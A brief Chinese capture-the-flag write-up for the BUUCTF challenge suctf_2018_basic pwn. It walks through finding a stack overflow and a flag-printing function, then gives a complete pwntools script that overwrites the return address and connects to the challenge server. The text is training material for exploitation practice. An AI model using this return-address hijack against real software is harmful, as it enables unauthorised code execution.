[BUUCTF]PWN——suctf_2018_basic pwn

suctf_2018_basic pwn

附件

步骤

  1. 例行检查,64位程序,开启了RELRO和NX
    在这里插入图片描述
  2. 试运行一下程序,看看大概的情况
    在这里插入图片描述
  3. 64位ida载入,检索字符串的时候发现了读出flag的函数,flag_addr=0x401157
    在这里插入图片描述
    main()
    在这里插入图片描述
    s存在溢出,简单的覆盖返回地址到后门函数类型的题目

完整exp

from pwn import *

r=remote('node3.buuoj.cn',25779)
flag_addr=0x401157

payload='a'*(0x110+8)+p64(flag_addr)

r.sendline(payload)

r.interactive()

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/mcmuyanga/article/details/113543146
pwn